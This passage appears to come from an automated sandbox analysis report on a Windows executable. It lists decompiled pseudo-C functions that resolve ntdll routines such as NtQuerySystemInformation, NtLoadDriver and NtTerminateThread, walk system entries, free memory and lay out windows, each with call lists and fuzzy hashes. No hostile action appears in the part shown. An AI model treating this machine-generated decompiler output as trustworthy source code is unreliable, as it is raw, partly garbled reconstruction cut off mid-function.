                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 975042529-0
                                                                                                                • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* _v20;
                                                                                                                				int _v24;
                                                                                                                				void _v56;
                                                                                                                				char _v584;
                                                                                                                				char _v588;
                                                                                                                				char _v41548;
                                                                                                                				void* __edi;
                                                                                                                				void* _t40;
                                                                                                                				void _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				intOrPtr _t67;
                                                                                                                				intOrPtr _t71;
                                                                                                                				int _t77;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				E0040B550(0xa248, __ecx);
                                                                                                                				_t77 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				E00408E31();
                                                                                                                				_t40 =  *0x41c47c;
                                                                                                                				if(_t40 != 0) {
                                                                                                                					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                                				}
                                                                                                                				if(_v8 == _t77) {
                                                                                                                					_v8 = 0x186a0;
                                                                                                                				}
                                                                                                                				_v8 = _v8 + 0x3e80;
                                                                                                                				_push(_v8);
                                                                                                                				L0040B26C();
                                                                                                                				_t81 = _t40;
                                                                                                                				_v20 = _t81;
                                                                                                                				memset(_t81, _t77, _v8);
                                                                                                                				_t83 = _t82 + 0x10;
                                                                                                                				_v24 = _t77;
                                                                                                                				E00408E31();
                                                                                                                				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                                				L5:
                                                                                                                				while(1) {
                                                                                                                					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                                						L16:
                                                                                                                						_t46 =  *_t81;
                                                                                                                						_t77 = 0;
                                                                                                                						if(_t46 == 0) {
                                                                                                                							_push(_v20);
                                                                                                                							L0040B272();
                                                                                                                							return _t46;
                                                                                                                						}
                                                                                                                						_t81 = _t81 + _t46;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					_t47 = _a4;
                                                                                                                					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                                					_v12 = _t77;
                                                                                                                					_v16 = _t71;
                                                                                                                					if(_t71 <= _t77) {
                                                                                                                						L10:
                                                                                                                						_t66 = 0;
                                                                                                                						L11:
                                                                                                                						if(_t66 == 0) {
                                                                                                                							E004090AF( &_v588);
                                                                                                                							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                							_t32 = _t81 + 0x20; // 0x20
                                                                                                                							memcpy( &_v56, _t32, 8);
                                                                                                                							_t83 = _t83 + 0x10;
                                                                                                                							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                                						} else {
                                                                                                                							_t26 = _t66 + 4; // 0x4
                                                                                                                							_t72 = _t26;
                                                                                                                							if( *_t26 == 0) {
                                                                                                                								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                								_t28 = _t81 + 0x20; // 0x20
                                                                                                                								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                                								_t83 = _t83 + 0x10;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                                					_t80 = _t47 + 0x28;
                                                                                                                					while(1) {
                                                                                                                						_t64 = E00405A92(_v12, _t80);
                                                                                                                						if( *_t64 == _t67) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						if(_v12 < _v16) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					_t66 = _t64;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}


























                                                                                                                APIs
                                                                                                                  • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                  • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                • memset.MSVCRT ref: 00409805
                                                                                                                • memcpy.MSVCRT ref: 0040988A
                                                                                                                • memcpy.MSVCRT ref: 004098C0
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3641025914-0
                                                                                                                • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E004067AC(char** __edi) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t9;
                                                                                                                				void** _t11;
                                                                                                                				char** _t15;
                                                                                                                				char** _t24;
                                                                                                                				void* _t25;
                                                                                                                				char* _t28;
                                                                                                                				char* _t29;
                                                                                                                				char* _t30;
                                                                                                                				char* _t31;
                                                                                                                				char** _t33;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				 *__edi = "cf@";
                                                                                                                				_t9 = E00406746(__edi);
                                                                                                                				_t28 = __edi[5];
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t28);
                                                                                                                					_push(_t28);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t29 = _t24[4];
                                                                                                                				if(_t29 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t29);
                                                                                                                					_push(_t29);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t30 = _t24[3];
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t9 = E004055D1(_t9, _t30);
                                                                                                                					_push(_t30);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t31 = _t24[2];
                                                                                                                				if(_t31 != 0) {
                                                                                                                					E004055D1(_t9, _t31);
                                                                                                                					_push(_t31);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t15 = _t24;
                                                                                                                				_pop(_t32);
                                                                                                                				_push(_t24);
                                                                                                                				_t33 = _t15;
                                                                                                                				_t25 = 0;
                                                                                                                				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                                					do {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                                						_t25 = _t25 + 1;
                                                                                                                					} while (_t25 < _t33[0xd]);
                                                                                                                				}
                                                                                                                				_t11 =  *( *_t33)();
                                                                                                                				free( *_t11);
                                                                                                                				return _t11;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                  • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                • free.MSVCRT(00000000), ref: 00406839
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2241099983-0
                                                                                                                • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagPOINT _v20;
                                                                                                                				struct tagRECT _v36;
                                                                                                                				int _t27;
                                                                                                                				struct HWND__* _t30;
                                                                                                                				struct HWND__* _t32;
                                                                                                                
                                                                                                                				_t30 = _a4;
                                                                                                                				if((_a8 & 0x00000001) != 0) {
                                                                                                                					_t32 = GetParent(_t30);
                                                                                                                					GetWindowRect(_t30,  &_v20);
                                                                                                                					GetClientRect(_t32,  &_v36);
                                                                                                                					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                					_v20.x = _t27;
                                                                                                                					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                				}
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					E00404FBB(_t30);
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00405D0A
                                                                                                                • GetWindowRect.USER32 ref: 00405D17
                                                                                                                • GetClientRect.USER32 ref: 00405D22
                                                                                                                • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _t20;
                                                                                                                				void* _t21;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t32;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t20 = __eax;
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_push(__ebx);
                                                                                                                				_t28 = __eax - 1;
                                                                                                                				L0040B26C();
                                                                                                                				_v16 = __eax;
                                                                                                                				if(_t28 > 0) {
                                                                                                                					_t21 = _a4;
                                                                                                                					_v8 = __ebx;
                                                                                                                					_v8 =  ~_v8;
                                                                                                                					_t32 = _t28 * __ebx + _t21;
                                                                                                                					_a4 = _t21;
                                                                                                                					do {
                                                                                                                						memcpy(_v16, _a4, __ebx);
                                                                                                                						memcpy(_a4, _t32, __ebx);
                                                                                                                						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                						_a4 = _a4 + __ebx;
                                                                                                                						_t32 = _t32 + _v8;
                                                                                                                						_t34 = _t34 + 0x24;
                                                                                                                						_v12 = _v12 + 1;
                                                                                                                						_t28 = _t28 - 1;
                                                                                                                					} while (_t28 > _v12);
                                                                                                                				}
                                                                                                                				_push(_v16);
                                                                                                                				L0040B272();
                                                                                                                				return _t20;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1252195045-0
                                                                                                                • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E00406746(void* __esi) {
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr _t11;
                                                                                                                				intOrPtr* _t18;
                                                                                                                				void* _t19;
                                                                                                                
                                                                                                                				_t19 = __esi;
                                                                                                                				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                                				if(_t9 != 0) {
                                                                                                                					_push(_t9);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                                				if(_t10 != 0) {
                                                                                                                					_push(_t10);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_push(_t11);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t11 =  *_t18;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_push(_t11);
                                                                                                                						L0040B272();
                                                                                                                						 *_t18 = 0;
                                                                                                                					}
                                                                                                                					_push(_t18);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t42;
                                                                                                                				RECT* _t44;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t42 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t37 = _a12;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                                							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(__ecx + 0x378);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(3);
                                                                                                                					_t44 = _t42 + 0x378;
                                                                                                                					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                                					_t42 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                				int _t14;
                                                                                                                
                                                                                                                				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                                					GetKeyState(0xa2);
                                                                                                                					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                                						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                                							_t14 = E00403A60(0xa5);
                                                                                                                							if(_t14 == 0) {
                                                                                                                								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                                			}




                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v1072;
                                                                                                                				void _v3672;
                                                                                                                				char _v4496;
                                                                                                                				intOrPtr _v4556;
                                                                                                                				char _v4560;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t45 = __eflags;
                                                                                                                				E0040B550(0x11cc, __ecx);
                                                                                                                				E00402923( &_v4560);
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E00406670( &_v4496, _t45);
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				memset( &_v3672, 0, 0x10);
                                                                                                                				E0040A909( &_v1072);
                                                                                                                				_t41 = _a4;
                                                                                                                				_v4556 = 0x71;
                                                                                                                				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                                					L0040B266();
                                                                                                                					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                                				}
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E004067AC( &_v4496);
                                                                                                                				return E00402940( &_v4560);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				void _v1026;
                                                                                                                				signed short _v1028;
                                                                                                                				void* __esi;
                                                                                                                				void* _t17;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				signed short* _t28;
                                                                                                                
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				_t26 = __ecx;
